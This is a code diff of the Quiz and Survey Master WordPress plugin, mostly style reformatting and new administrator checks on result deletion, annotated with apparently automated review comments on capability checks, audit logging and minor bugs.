-					<a class="button button-primary qsm-dashboard-section-create-quiz"  href="<?php echo esc_url(admin_url('admin.php?page=qsm_create_quiz_page')); ?>" ><?php esc_html_e( 'Get Started', 'quiz-master-next' ) ?><img class="qsm-dashboard-help-image" src="<?php echo esc_url(QSM_PLUGIN_URL . 'assets/right-arrow.png'); ?>" alt="right-arrow.png"/></a>
+					<a class="button button-primary qsm-dashboard-section-create-quiz"  href="<?php echo esc_url( admin_url( 'admin.php?page=qsm_create_quiz_page' ) ); ?>" ><?php esc_html_e( 'Get Started', 'quiz-master-next' ); ?><img class="qsm-dashboard-help-image" src="<?php echo esc_url( QSM_PLUGIN_URL . 'assets/right-arrow.png' ); ?>" alt="right-arrow.png"/></a>
 				</div>
 			</div>

 			<?php
 			$qsm_admin_dd = qsm_get_parsing_script_data();
 			if ( $qsm_admin_dd ) {
-				$popular_addons = isset($qsm_admin_dd['popular_products']) ? $qsm_admin_dd['popular_products'] : [];
-				$themes = isset($qsm_admin_dd['themes']) ? $qsm_admin_dd['themes'] : [];
+				$popular_addons = isset( $qsm_admin_dd['popular_products'] ) ? $qsm_admin_dd['popular_products'] : array();
+				$themes         = isset( $qsm_admin_dd['themes'] ) ? $qsm_admin_dd['themes'] : array();
 				qsm_check_plugins_compatibility();
 				qsm_dashboard_recent_taken_quiz();
-				qsm_dashboard_display_popular_theme_section($themes);
-				qsm_dashboard_display_popular_addon_section($popular_addons);
+				qsm_dashboard_display_popular_theme_section( $themes );
+				qsm_dashboard_display_popular_addon_section( $popular_addons );
 				qsm_dashboard_display_change_log_section();
 				qsm_dashboard_display_need_help_section();
 			} else {
@@ -416,7 +429,7 @@
 	</div>
 	<?php qsm_display_promotion_links_section(); ?>
 </div>
-<?php
+	<?php
 }
 /**
  * @since 7.0
@@ -454,33 +467,33 @@
 			<ul class="what-new-ul">
 				<li>
 					<a href="https://app.productstash.io/qsm#/roadmap"
-						target="_blank" rel="noopener"> <?php esc_html_e( "Roadmap", "quiz-master-next"); ?>
+						target="_blank" rel="noopener"> <?php esc_html_e( 'Roadmap', 'quiz-master-next' ); ?>
 					</a>
 					<div class="post-description">
-						<?php esc_html_e( "Visit out public Roadmap to checkout what's in the development pipepline of QSM.", "quiz-master-next"); ?>
+						<?php esc_html_e( "Visit out public Roadmap to checkout what's in the development pipepline of QSM.", 'quiz-master-next' ); ?>
 					</div>
 				</li>
 				<li>
 					<a href="https://app.productstash.io/qsm#/updates"
-						target="_blank" rel="noopener"><?php esc_html_e( "Recent Updates", "quiz-master-next"); ?>
+						target="_blank" rel="noopener"><?php esc_html_e( 'Recent Updates', 'quiz-master-next' ); ?>
 					</a>
 					<div class="post-description">
-						<?php esc_html_e( "Checkout our updates page to know more about our recent releases", "quiz-master-next"); ?>
+						<?php esc_html_e( 'Checkout our updates page to know more about our recent releases', 'quiz-master-next' ); ?>
 					</div>
 				</li>
 				<li>
 					<a href="https://app.productstash.io/qsm#/ideas"
-						target="_blank" rel="noopener"><?php esc_html_e( "Submit your ideas", "quiz-master-next"); ?>
+						target="_blank" rel="noopener"><?php esc_html_e( 'Submit your ideas', 'quiz-master-next' ); ?>
 					</a>
 					<div class="post-description">
-						<?php esc_html_e( "We are open your suggestions on how to improve QSM. Please visit our ideas page to share your thoughts.", "quiz-master-next"); ?>
+						<?php esc_html_e( 'We are open your suggestions on how to improve QSM. Please visit our ideas page to share your thoughts.', 'quiz-master-next' ); ?>
 					</div>
 				</li>
 			</ul>
 		</div>
 	</div>
 </div>
-<?php
+	<?php
 }

 /**
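Review bot: the user-facing strings re-quoted in this hunk still carry their typos ("Visit out public Roadmap", "pipepline", "We are open your suggestions"). Since every one of these esc_html_e() lines is already being touched, correct the msgids in the same pass ("Visit our public Roadmap", "pipeline", "We are open to your suggestions") so translators only have to re-sync once.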
@@ -489,11 +502,11 @@
  */
 function qsm_create_new_quiz_from_wizard() {
 	// Create new quiz.
-	if ( isset( $_POST['qsm_new_quiz_nonce'] ) && wp_verify_nonce( sanitize_text_field( wp_unslash($_POST['qsm_new_quiz_nonce'] ) ), 'qsm_new_quiz' ) ) {
+	if ( isset( $_POST['qsm_new_quiz_nonce'] ) && wp_verify_nonce( sanitize_text_field( wp_unslash( $_POST['qsm_new_quiz_nonce'] ) ), 'qsm_new_quiz' ) ) {
 		global $mlwQuizMasterNext;
 		$quiz_name = isset( $_POST['quiz_name'] ) ? sanitize_text_field( wp_unslash( $_POST['quiz_name'] ) ) : '';
 		$quiz_name = htmlspecialchars( $quiz_name, ENT_QUOTES );
-		$theme_id    = isset( $_POST['quiz_theme_id'] ) ? intval( $_POST['quiz_theme_id'] ) : 0;
+		$theme_id  = isset( $_POST['quiz_theme_id'] ) ? intval( $_POST['quiz_theme_id'] ) : 0;
 		unset( $_POST['qsm_new_quiz_nonce'] );
 		unset( $_POST['_wp_http_referer'] );
 		unset( $_POST['quiz_theme_id'] );
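Review bot: the only gate on qsm_create_new_quiz_from_wizard() visible here is the qsm_new_quiz nonce in the first if condition, and a nonce proves request intent, not privilege. Pair wp_verify_nonce() with a current_user_can() check for the capability that governs quiz creation before any $_POST field is read, so that a leaked or reusable nonce cannot be used by a lower-privileged account.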
@@ -521,26 +534,30 @@
 		/**
 		 * Prepare Contact Fields
 		 */
-		$contact_form    = array();
+		$contact_form = array();
 		if ( isset( $_POST['enable_contact_form'] ) && 1 == sanitize_text_field( wp_unslash( $_POST['enable_contact_form'] ) ) ) {
-			$cf_fields       = QSM_Contact_Manager::default_fields();
+			$cf_fields = QSM_Contact_Manager::default_fields();
 			if ( isset( $cf_fields['name'] ) ) {
 				$cf_fields['name']['enable'] = 'true';
 				$contact_form[]              = $cf_fields['name'];
 			}
 			if ( isset( $cf_fields['email'] ) ) {
-				$cf_fields['email']['enable']    = 'true';
-				$contact_form[]                  = $cf_fields['email'];
+				$cf_fields['email']['enable'] = 'true';
+				$contact_form[]               = $cf_fields['email'];
 			}
 		}
 		/**
 		 * Prepare Quiz Options
 		 */
 		$quiz_options = apply_filters( 'qsm_quiz_wizard_settings_option_save', $quiz_options );
-		$mlwQuizMasterNext->quizCreator->create_quiz( $quiz_name, $theme_id, array(
-			'quiz_options' => $quiz_options,
-			'contact_form' => $contact_form,
-		) );
+		$mlwQuizMasterNext->quizCreator->create_quiz(
+			$quiz_name,
+			$theme_id,
+			array(
+				'quiz_options' => $quiz_options,
+				'contact_form' => $contact_form,
+			)
+		);
 	}
 }

--- a/quiz-master-next/php/admin/admin-results-page.php
+++ b/quiz-master-next/php/admin/admin-results-page.php
@@ -116,7 +116,7 @@
 	global $mlwQuizMasterNext;

 	// If nonce is correct, delete results.
-	if ( isset( $_POST['delete_results_nonce'] ) && wp_verify_nonce( sanitize_text_field( wp_unslash( $_POST['delete_results_nonce'] ) ), 'delete_results' ) ) {
+	if ( isset( $_POST['delete_results_nonce'] ) && wp_verify_nonce( sanitize_text_field( wp_unslash( $_POST['delete_results_nonce'] ) ), 'delete_results' ) && current_user_can( 'administrator' ) ) {

 		$mlw_delete_results_id   = isset( $_POST['result_id'] ) ? intval( $_POST['result_id'] ) : 0;
 		$mlw_delete_results_name = isset( $_POST['delete_quiz_name'] ) ? sanitize_text_field( wp_unslash( $_POST['delete_quiz_name'] ) ) : '';
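Review bot: the added current_user_can( 'administrator' ) tests a role name, which WordPress discourages because role checks through current_user_can() can give unreliable results and ignore custom roles that a site owner has granted result management to. Check a capability instead; this file already uses delete_others_qsm_quizzes for the View link. Also evaluate the capability before the nonce and return an explicit error when it fails, because as written an unauthorized POST falls through silently and leaves nothing for an operator to see.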
@@ -140,9 +140,9 @@
 			$mlwQuizMasterNext->alertManager->newAlert( sprintf( __( 'There was an error when deleting this result. Error from WordPress: %s', 'quiz-master-next' ), $error ), 'error' );
 			$mlwQuizMasterNext->log_manager->add( 'Error deleting result', "Tried {$wpdb->last_query} but got $error.", 0, 'error' );
 		} else {
-			qsm_delete_results_attachments($row_before_update);
+			qsm_delete_results_attachments( $row_before_update );
 			$mlwQuizMasterNext->alertManager->newAlert( __( 'Your results has been deleted successfully.', 'quiz-master-next' ), 'success' );
-			$mlwQuizMasterNext->audit_manager->new_audit( "Results Has Been Deleted From:", $mlw_delete_results_name, "" );
+			$mlwQuizMasterNext->audit_manager->new_audit( 'Results Has Been Deleted From:', $mlw_delete_results_name, '' );
 		}
 	}

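Review bot: the audit entry on the success path records $mlw_delete_results_name, which this function reads straight from $_POST['delete_quiz_name'], so the log shows whatever name the client sent rather than the quiz that was actually deleted. Take the name from $row_before_update and include $mlw_delete_results_id and get_current_user_id() in the entry; without them a deletion cannot be tied to a record or an account during incident review.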
@@ -153,11 +153,11 @@
 		if ( isset( $_POST["delete_results"] ) && is_array( $_POST["delete_results"] ) ) {
 			$delete_results = array_map( 'sanitize_text_field', wp_unslash( $_POST["delete_results"] ) );
 			$table_name = $wpdb->prefix . 'mlw_results';
-			$query = $wpdb->prepare(
-				"SELECT * FROM $table_name WHERE result_id IN (" . implode(',', array_fill(0, count($delete_results), '%d')) . ")",
+			$query      = $wpdb->prepare(
+				"SELECT * FROM $table_name WHERE result_id IN (" . implode( ',', array_fill( 0, count( $delete_results ), '%d' ) ) . ')',
 				$delete_results
 			);
-			$row_before_update = $wpdb->get_results($query);
+			$row_before_update = $wpdb->get_results( $query );

 			// Cycle through the POST array which should be an array of the result ids of the results the user wishes to delete
 			foreach ( $delete_results as $result ) {
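Review bot: the bulk path around $_POST["delete_results"] needs the same capability check that the single-result branch received; its enclosing condition sits above this hunk, so verify it there before merging. Two smaller points in the visible lines: the ids are cleaned with sanitize_text_field but bound as %d, so array_map( 'absint', ... ) states the intent better, and is_array() is true for an empty array, which makes the prepared statement read IN () and fail; return early when count( $delete_results ) is 0.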
@@ -174,8 +174,8 @@
 					);
 				}
 			}
-			qsm_delete_results_attachments($row_before_update);
-			$mlwQuizMasterNext->audit_manager->new_audit( "Results Have Been Bulk Deleted", "", "" );
+			qsm_delete_results_attachments( $row_before_update );
+			$mlwQuizMasterNext->audit_manager->new_audit( 'Results Have Been Bulk Deleted', '', '' );
 		}
 	}

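Review bot: the bulk audit call passes two empty strings, so the log says that something was bulk deleted but not which result ids, how many, or by whom. Pass the id list (or at least its count) and the current user id in those arguments so the entry is usable for detection and for reconstructing what was lost.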
@@ -389,7 +389,7 @@
 			'view_result_page' => __( 'Result Page', 'quiz-master-next' ),
 		) );

-		$values      = $quiz_infos   = [];
+		$values      = $quiz_infos   = array();
 		foreach ( $th_elements as $key => $th ) {
 			$values[ $key ]['title'] = $th;
 			$values[ $key ]['style'] = "";
@@ -445,8 +445,7 @@
 				if ( isset( $values['score'] ) ) {
 					if ( 1 === intval( $form_type ) || 2 === intval( $form_type ) ) {
 						$values['score']['content'][] = esc_html__( 'Not Graded', 'quiz-master-next' );
-					} else {
-						if ( 0 === intval( $mlw_quiz_info->quiz_system ) ) {
+					} elseif ( 0 === intval( $mlw_quiz_info->quiz_system ) ) {
 							$values['score']['content'][] = sprintf( '%1$s %2$s %3$s %4$s %5$s', esc_html( $mlw_quiz_info->correct ), esc_html__( 'out of', 'quiz-master-next' ), esc_html( $out_of_q ), esc_html__( 'or', 'quiz-master-next' ), esc_html( $mlw_quiz_info->correct_score ) );
 						} elseif ( 1 === intval( $mlw_quiz_info->quiz_system ) ) {
 							$values['score']['content'][] = sprintf( '%1$s %2$s', esc_html( $mlw_quiz_info->point_score ), esc_html__( 'Points', 'quiz-master-next' ) );
@@ -454,7 +453,6 @@
 							$values['score']['content'][] = sprintf( '%1$s %2$s %3$s %4$s %5$s <br /> %6$s %7$s', esc_html( $mlw_quiz_info->correct ), esc_html__( 'out of', 'quiz-master-next' ), esc_html( $out_of_q ), esc_html__( 'or', 'quiz-master-next' ), esc_html( $mlw_quiz_info->correct_score ), esc_html( $mlw_quiz_info->point_score ), esc_html__( 'Points', 'quiz-master-next' ) );
 						} else {
 							$values['score']['content'][] = esc_html__( 'Not Graded', 'quiz-master-next' );
-						}
 					}
 				}

@@ -521,7 +519,7 @@
 					$values['view_result_page']['content'][] = '<a target="_blank" class="button" href="' . esc_url( $quiz_page_url ) . '?result_id=' . esc_attr( $unique_id ) . '">' . esc_html__( 'View', 'quiz-master-next' ) . '</a>';
 				}
 				foreach ( $values as $k => $v ) {
-					if ( ! in_array( $k, [ 'score', 'time_complete', 'name', 'business', 'email', 'phone', 'user', 'time_taken', 'ip', 'page_name', 'page_url', 'view_result_page' ], true ) ) {
+					if ( ! in_array( $k, array( 'score', 'time_complete', 'name', 'business', 'email', 'phone', 'user', 'time_taken', 'ip', 'page_name', 'page_url', 'view_result_page' ), true ) ) {
 						$content = apply_filters( 'mlw_qmn_admin_results_page_column_content', '', $mlw_quiz_info, $k );
 						if ( isset( $values[ $k ] ) && ! empty( $content ) ) {
 							$values[ $k ]['content'][] = $content;
@@ -564,7 +562,9 @@
 									if ( ( current_user_can( 'view_qsm_quiz_result' ) && get_current_user_id() == $quiz_infos[ $x ]->user ) || current_user_can( 'delete_others_qsm_quizzes' ) ) { ?>
 										<a href="admin.php?page=qsm_quiz_result_details&result_id=<?php echo esc_attr( $quiz_infos[ $x ]->result_id ); ?>"><?php esc_html_e( 'View', 'quiz-master-next' ); ?></a>
 									<?php } ?>
-									<a style="color: red;" class="delete_table_quiz_results_item" data-quiz-id="<?php echo esc_attr( $quiz_infos[ $x ]->result_id ); ?>" data-quiz-name="<?php echo esc_attr( $quiz_infos[ $x ]->quiz_name ); ?>" href='#'><?php esc_html_e( 'Delete', 'quiz-master-next' ); ?></a>
+									<?php if ( current_user_can('administrator') ) { ?>
+										<a style="color: red;" class="delete_table_quiz_results_item" data-quiz-id="<?php echo esc_attr( $quiz_infos[ $x ]->result_id ); ?>" data-quiz-name="<?php echo esc_attr( $quiz_infos[ $x ]->quiz_name ); ?>" href='#'><?php esc_html_e( 'Delete', 'quiz-master-next' ); ?></a>
+									<?php } ?>
 									<?php if ( ! class_exists( 'QSM_Proctoring_Quiz' ) ) { ?>
 										<a class="qsm-quiz-proctor-addon" href="#"><?php esc_html_e( 'Proctor Reports', 'quiz-master-next' ); ?></a>
 									<?php } ?>
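Review bot: the new gate around the Delete link checks the role name 'administrator', while the View link directly above is gated on the capabilities view_qsm_quiz_result and delete_others_qsm_quizzes. Use the same capability model for Delete so custom roles behave consistently, and treat this wrapper as presentation only: hiding the anchor does not stop a crafted POST, so the handler that processes result_id must enforce the identical check.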
@@ -595,30 +595,30 @@
 			</tbody>
 		</table>
 	</form>
-
-	<div class="qsm-popup qsm-popup-slide qsm-standard-popup " id="qsm-delete-result-page-popup" aria-hidden="false"  style="display:none">
-		<div class="qsm-popup__overlay" tabindex="-1" data-micromodal-close>
-			<div class="qsm-popup__container" role="dialog" aria-modal="true">
-				<form action='' method='post'>
-					<header class="qsm-popup__header qsm-delete-result-page-popup-header">
-						<div class="qsm-popup__title qsm-upgrade-box-title" id="modal-2-title"></div>
-						<a class="qsm-popup__close qsm-popup-upgrade-close" aria-label="Close modal" data-micromodal-close></a>
-					</header>
-					<main class="qsm-popup__content" id="modal-2-content">
-						<div class="qsm-result-page-delete-message"><?php esc_html_e( 'Are you sure you want to delete these results?', 'quiz-master-next' ); ?></div>
-							<?php wp_nonce_field( 'delete_results', 'delete_results_nonce' ); ?>
-							<input type='hidden' id='result_id' name='result_id' value='' />
-							<input type='hidden' id='delete_quiz_name' name='delete_quiz_name' value='' />
-					</main>
-					<footer class="qsm-popup__footer">
-						<button class="qsm-popup__btn" data-micromodal-close aria-label="Close this dialog window"><?php esc_html_e( 'Cancel', 'quiz-master-next' ); ?></button>
-						<button type="submit" class="qsm-popup__btn qsm-delete-result-popup-btn"><span class="dashicons dashicons-warning"></span><?php esc_html_e( 'Delete Result', 'quiz-master-next' ); ?></button>
-					</footer>
-				</form>
+	<?php if ( current_user_can('administrator') ) { ?>
+		<div class="qsm-popup qsm-popup-slide qsm-standard-popup " id="qsm-delete-result-page-popup" aria-hidden="false"  style="display:none">
+			<div class="qsm-popup__overlay" tabindex="-1" data-micromodal-close>
+				<div class="qsm-popup__container" role="dialog" aria-modal="true">
+					<form action='' method='post'>
+						<header class="qsm-popup__header qsm-delete-result-page-popup-header">
+							<div class="qsm-popup__title qsm-upgrade-box-title" id="modal-2-title"></div>
+							<a class="qsm-popup__close qsm-popup-upgrade-close" aria-label="Close modal" data-micromodal-close></a>
+						</header>
+						<main class="qsm-popup__content" id="modal-2-content">
+							<div class="qsm-result-page-delete-message"><?php esc_html_e( 'Are you sure you want to delete these results?', 'quiz-master-next' ); ?></div>
+								<?php wp_nonce_field( 'delete_results', 'delete_results_nonce' ); ?>
+								<input type='hidden' id='result_id' name='result_id' value='' />
+								<input type='hidden' id='delete_quiz_name' name='delete_quiz_name' value='' />
+						</main>
+						<footer class="qsm-popup__footer">
+							<button class="qsm-popup__btn" data-micromodal-close aria-label="Close this dialog window"><?php esc_html_e( 'Cancel', 'quiz-master-next' ); ?></button>
+							<button type="submit" class="qsm-popup__btn qsm-delete-result-popup-btn"><span class="dashicons dashicons-warning"></span><?php esc_html_e( 'Delete Result', 'quiz-master-next' ); ?></button>
+						</footer>
+					</form>
+				</div>
 			</div>
 		</div>
-	</div>
-
+	<?php } ?>
 	<!-- Popup for screen options -->
 	<div class="qsm-popup qsm-popup-slide" id="modal-results-screen-option" aria-hidden="true">
 		<div class="qsm-popup__overlay" tabindex="-1" data-micromodal-close>
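Review bot: the popup gate repeats the literal current_user_can('administrator') used for the link, so the render condition and the delete handler's condition are now three separate copies that can drift. Move the decision into one helper built on a capability and call it from all three places. Moving wp_nonce_field( 'delete_results', ... ) inside the gate is a useful side effect, since lower-privileged users no longer receive a valid nonce, but the handler must not rely on that. Separately, the container still declares aria-hidden="false" while being display:none.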
@@ -678,7 +678,7 @@
 			"id"           => 'modal-proctor-quiz',
 			"title"        => __('Secure Your Quizzes with Proctoring', 'quiz-master-next'),
 			"description"  => __('Monitor and prevent cheating with the Quiz Proctor Addon.', 'quiz-master-next'),
-			"chart_image"  => plugins_url('', dirname(__FILE__)) . '/images/proctor_quiz_chart.png',
+			"chart_image"  => plugins_url('', __DIR__) . '/images/proctor_quiz_chart.png',
 			"information"  => __('QSM Addon Bundle is the best way to get all our add-ons at a discount. Upgrade to save 95% today OR you can buy Quiz Proctor Addon separately.', 'quiz-master-next'),
 			"buy_btn_text" => __('Buy Quiz Proctor Addon', 'quiz-master-next'),
 			"doc_link"     => qsm_get_plugin_link( 'docs/add-ons/quiz-proctor/', 'quiz-documentation', 'plugin', 'quiz-proctor', 'qsm_plugin_upsell' ),
@@ -701,7 +701,7 @@
 		"id"           => 'export-results',
 		"title"        => __( 'Effortlessly Export Quiz Data', 'quiz-master-next' ),
 		"description"  => __( 'Manage quiz results with the Export Results Addon.', 'quiz-master-next' ),
-		"chart_image"  => plugins_url( '', dirname( __FILE__ ) ) . '/images/export_results.png',
+		"chart_image"  => plugins_url( '', __DIR__ ) . '/images/export_results.png',
 		"warning"      => __( 'Export Results Addon required', 'quiz-master-next' ),
 		"information"  => __( 'QSM Addon Bundle is the best way to get all our add-ons at a discount. Upgrade to save 95% today. OR you can buy Export Results Addon separately.', 'quiz-master-next' ),
 		"buy_btn_text" => __( 'Buy Export Results Addon', 'quiz-master-next' ),
@@ -721,7 +721,7 @@
 		"id"           => 'reporting-analysis',
 		"title"        => __( 'Gain Powerful Insights with In-Depth Reports', 'quiz-master-next' ),
 		"description"  => __( 'Analyze performance trends with the Reporting & Analysis Addon.', 'quiz-master-next' ),
-		"chart_image"  => plugins_url( '', dirname( __FILE__ ) ) . '/images/report_analysis_chart.png',
+		"chart_image"  => plugins_url( '', __DIR__ ) . '/images/report_analysis_chart.png',
 		"warning"      => __( 'Reporting & Analysis Addon required', 'quiz-master-next' ),
 		"information"  => __( 'QSM Addon Bundle is the best way to get all our add-ons at a discount. Upgrade to save 95% today. OR you can buy Reporting & Analysis Addon separately.', 'quiz-master-next' ),
 		"buy_btn_text" => __( 'Buy Reporting & Analysis Addon', 'quiz-master-next' ),
@@ -742,7 +742,7 @@
 		"id"           => 'proctoring-quiz',
 		"title"        => __('Secure Your Quizzes with Proctoring', 'quiz-master-next'),
 		"description"  => __('Monitor and prevent cheating with the Quiz Proctor Addon.', 'quiz-master-next'),
-		"chart_image"  => plugins_url( '', dirname( __FILE__ ) ) . '/images/proctor_quiz_chart.png',
+		"chart_image"  => plugins_url( '', __DIR__ ) . '/images/proctor_quiz_chart.png',
 		"warning"      => __( 'Missing Feature - Quiz Proctor Add-on required', 'quiz-master-next' ),
 		"information"  => __( 'QSM Addon Bundle is the best way to get all our add-ons at a discount. Upgrade to save 95% today. OR you can buy Proctoring Quiz Addon separately.', 'quiz-master-next' ),
 		"buy_btn_text" => __( 'Buy Quiz Proctor Addon', 'quiz-master-next' ),
--- a/quiz-master-next/php/admin/create-quiz-page.php
+++ b/quiz-master-next/php/admin/create-quiz-page.php
@@ -6,24 +6,24 @@
 function qsm_activate_plugin_ajax_activate_plugin() {
     // Check if the user has permission to activate plugins
     if ( ! current_user_can('activate_plugins') ) {
-        wp_send_json_error([ 'message' => 'Permission denied.' ]);
+        wp_send_json_error(array( 'message' => 'Permission denied.' ));
         wp_die();
     }
     check_ajax_referer('qsm_installer_nonce', 'nonce');
     if ( empty($_POST['plugin_path']) ) {
-        wp_send_json_error([ 'message' => 'No plugin path provided.' ]);
+        wp_send_json_error(array( 'message' => 'No plugin path provided.' ));
         wp_die();
     }
     $plugin_path = isset($_POST['plugin_path']) ? sanitize_text_field(wp_unslash( $_POST['plugin_path'] ) ) : "";
     $result = activate_plugin($plugin_path);
-	wp_send_json_success([ 'message' => 'Plugin activated successfully.' ]);
+	wp_send_json_success(array( 'message' => 'Plugin activated successfully.' ));
     wp_die();
 }

 function qsm_activate_plugin_ajax_handler() {
     // Check if the user has permission to activate plugins
     if ( ! current_user_can('activate_plugins') ) {
-        wp_send_json_error([ 'message' => 'Permission denied.' ]);
+        wp_send_json_error(array( 'message' => 'Permission denied.' ));
         wp_die();
     }

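Review bot: in qsm_activate_plugin_ajax_activate_plugin() the return value of activate_plugin( $plugin_path ) is stored in $result and never inspected, so the handler answers 'Plugin activated successfully.' even when activation returned a WP_Error. Branch on is_wp_error( $result ) and send wp_send_json_error() with the message in that case. The wp_die() calls after wp_send_json_error() and wp_send_json_success() are unreachable, because those functions already terminate the request.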
@@ -38,9 +38,9 @@

     $all_plugins = get_plugins();
 	if ( isset($all_plugins[ $plugin_path ]) ) {
-		wp_send_json_success([ 'version' => esc_html__('Version: ', 'quiz-master-next') . $all_plugins[ $plugin_path ]['Version'] ]);
+		wp_send_json_success(array( 'version' => esc_html__('Version: ', 'quiz-master-next') . $all_plugins[ $plugin_path ]['Version'] ));
 	} else {
-		wp_send_json_error([ 'message' => 'Plugin not found.' ]);
+		wp_send_json_error(array( 'message' => 'Plugin not found.' ));
 	}
     wp_die();
 }
@@ -59,7 +59,7 @@
 	global $wpdb;
 	$query = $wpdb->prepare("SELECT id FROM {$wpdb->prefix}mlw_themes WHERE theme = %s", $theme_slug);
 	$id = $wpdb->get_var($query);
-	wp_send_json_success([ 'id' => $id ]);
+	wp_send_json_success(array( 'id' => $id ));
     wp_die();
 }

@@ -74,7 +74,7 @@
 	}

 	// Filter active themes to ensure their directories exist
-	$filtered_active_themes = [];
+	$filtered_active_themes = array();
 	if ( ! empty($active_themes) ) {
 		foreach ( $active_themes as $theme ) {
 			$theme_dir = WP_PLUGIN_DIR . '/' . $theme['theme'];
@@ -85,7 +85,7 @@
 	}

 	// Merge installed themes and filtered active themes
-	$merged_themes = [];
+	$merged_themes = array();
 	foreach ( array_merge($installed_themes, $filtered_active_themes) as $theme ) {
 		$key = $theme['theme'];
 		if ( ! isset($merged_themes[ $key ]) ) {
@@ -176,12 +176,12 @@
 						foreach ( $all_addons as $addon ) {
 							if ( $addon['id'] == $theme_value['id'] ) {
 								// Merge the additional keys into the theme array
-								$theme_value = array_merge($theme_value, [
+								$theme_value = array_merge($theme_value, array(
 									'path'         => $addon['path'],
 									'icon'         => $addon['icon'],
 									'settings_tab' => $addon['settings_tab'],
 									'option'       => $addon['option'],
-								]);
+								));
 								break; // Stop looping once a match is found
 							}
 						}
@@ -439,28 +439,28 @@
 							$all_addons = $qsm_admin_dd['all_addons'];
 							$all_themes = $qsm_admin_dd['themes'];

-							$dashboard_pages = [
-								[
+							$dashboard_pages = array(
+								array(
 									'page_no'  => 1,
 									'callback' => 'qsm_dashboard_display_quizoptions_section',
-									'params'   => [ $quizoptions_boxes ],
-								],
-								[
+									'params'   => array( $quizoptions_boxes ),
+								),
+								array(
 									'page_no'  => 2,
 									'callback' => 'qsm_dashboard_display_theme_section',
-									'params'   => [ $all_themes, $installer_option, $invalid_and_expired, $all_addons, $installer_activated, $installer_script ],
-								],
-								[
+									'params'   => array( $all_themes, $installer_option, $invalid_and_expired, $all_addons, $installer_activated, $installer_script ),
+								),
+								array(
 									'page_no'  => 3,
 									'callback' => 'qsm_dashboard_display_addons_section',
-									'params'   => [ $all_addons, $installer_option, $invalid_and_expired, $installer_activated, $installer_script ],
-								],
-								[
+									'params'   => array( $all_addons, $installer_option, $invalid_and_expired, $installer_activated, $installer_script ),
+								),
+								array(
 									'page_no'  => 4,
 									'callback' => 'qsm_dashboard_display_quizform_section',
-									'params'   => [],
-								],
-							];
+									'params'   => array(),
+								),
+							);

 							foreach ( $dashboard_pages as $page ) {
 								echo '<div class="qsm-dashboard-container-pages" data-page-no="' . esc_attr($page['page_no']) . '" style="display: none;">';
@@ -490,5 +490,4 @@
 		</div><!-- qsm-new-quiz-wrapper -->
 	</div>
 	<?php
-
 }
 No newline at end of file
--- a/quiz-master-next/php/admin/functions.php
+++ b/quiz-master-next/php/admin/functions.php
@@ -1101,7 +1101,7 @@
 		"id"           => 'modal-advanced-question-type',
 		"title"        => __('Go Beyond Standard Questions', 'quiz-master-next'),
 		"description"  => __('Make your quizzes more engaging with the Advanced Question Types Addon.', 'quiz-master-next'),
-		"chart_image"  => plugins_url('', dirname(__FILE__)) . '/images/advanced_question_type.png',
+		"chart_image"  => plugins_url('', __DIR__) . '/images/advanced_question_type.png',
 		"information"  => __('QSM Addon Bundle is the best way to get all our add-ons at a discount. Upgrade to save 95% today OR you can buy Advanced Question Addon separately.', 'quiz-master-next'),
 		"buy_btn_text" => __('Buy Advanced Questions Addon', 'quiz-master-next'),
 		"doc_link"     => qsm_get_plugin_link( 'docs/question-types', 'qsm_list', 'advance-question_type', 'advance-question-upsell_read_documentation', 'qsm_plugin_upsell' ),
@@ -1233,8 +1233,6 @@
 }

 /**
- * Generates theme setting feilds
- *
  * @since 8.0.5
  * @param string $type input type
 * @return string $label input label
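Review bot: deleting the summary line leaves this docblock with tags but no description of what the function does. The original line only had a typo ("feilds"); restore it as "Generates theme setting fields" instead of removing it.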
@@ -1422,12 +1420,11 @@
 			'selected' => array(),
 		),
 	);
-	echo sprintf(
+	printf(
 		'<select name="%1$s" class="qsm-theme-option-unit"> %2$s </select>',
 		esc_attr( $param['name'] ),
 		wp_kses( $options, $allowed_tags )
 	);
-
 }

 function qsm_get_input_label_selected( $param ) {
@@ -1459,7 +1456,7 @@
             'selected' => array(),
         ),
     );
-    echo sprintf(
+    printf(
         '<select name="%1$s"> %2$s </select>',
         esc_attr( $param['name'] ),
         wp_kses( $options ,$allowed_tags)
@@ -1476,7 +1473,7 @@
 				"id"           => 'advanced-assessment',
 				"title"        => __( 'Advanced Assessment, Smarter Results', 'quiz-master-next' ),
 				"description"  => __( 'Unlock Personalized Quiz Experiences with the Advanced Assessment Addon.', 'quiz-master-next' ),
-				"chart_image"  => plugins_url( '', dirname( __FILE__ ) ) . '/images/advance-assessment-chart.png',
+				"chart_image"  => plugins_url( '', __DIR__ ) . '/images/advance-assessment-chart.png',
 				"warning"      => __( 'Missing Feature - Advanced Assessment Add-on required', 'quiz-master-next' ),
 				"information"  => __( 'Get all our add-ons at a discounted rate with the QSM Addon Bundle and save up to 95% today! Alternatively, you can also purchase the Advanced Assessment Addon separately.', 'quiz-master-next' ),
 				"buy_btn_text" => __( 'Buy Quiz Advanced Assessment', 'quiz-master-next' ),
@@ -1501,7 +1498,7 @@
 			"id"           => 'modal-extra-shortcodes',
 			"title"        => __('Unlock More Customization with Extra Shortcodes', 'quiz-master-next'),
 			"description"  => __('Enhance quiz display and functionality with the Extra Shortcodes Addon.', 'quiz-master-next'),
-			"chart_image"  => plugins_url('', dirname(__FILE__)) . '/images/extra-shortcodes.png',
+			"chart_image"  => plugins_url('', __DIR__) . '/images/extra-shortcodes.png',
 			"information"  => __('QSM Addon Bundle is the best way to get all our add-ons at a discount. Upgrade to save 95% today OR you can buy QSM Extra Shortodes Addon separately.', 'quiz-master-next'),
 			"buy_btn_text" => __('Buy QSM Extra Shortodes Addon', 'quiz-master-next'),
 			"doc_link"     => qsm_get_plugin_link( 'docs/add-ons/extra-shortcodes/', 'qsm_list', 'extrashortcodea_button', 'extra-shortcodes-upsell_read_documentation', 'qsm_plugin_upsell' ),
@@ -1528,7 +1525,7 @@
 			"id"           => 'modal-qsm-webhooks',
 			"title"        => __( 'Automate Your Workflow with QSM Webhooks', 'quiz-master-next' ),
 			"description"  => __( 'Enhance your quizzes with seamless integrations using the QSM Webhooks Addon.', 'quiz-master-next' ),
-			"chart_image"  => plugins_url( '', dirname( __FILE__ ) ) . '/images/proctor_quiz_chart.png',
+			"chart_image"  => plugins_url( '', __DIR__ ) . '/images/proctor_quiz_chart.png',
 			"warning"      => __( 'Missing Feature - webhook Add-On required', 'quiz-master-next' ),
 			"information"  => __( 'QSM Addon Bundle is the best way to get all our add-ons at a discount. Upgrade to save 95% today. OR you can buy Webhooks Addon separately.', 'quiz-master-next' ),
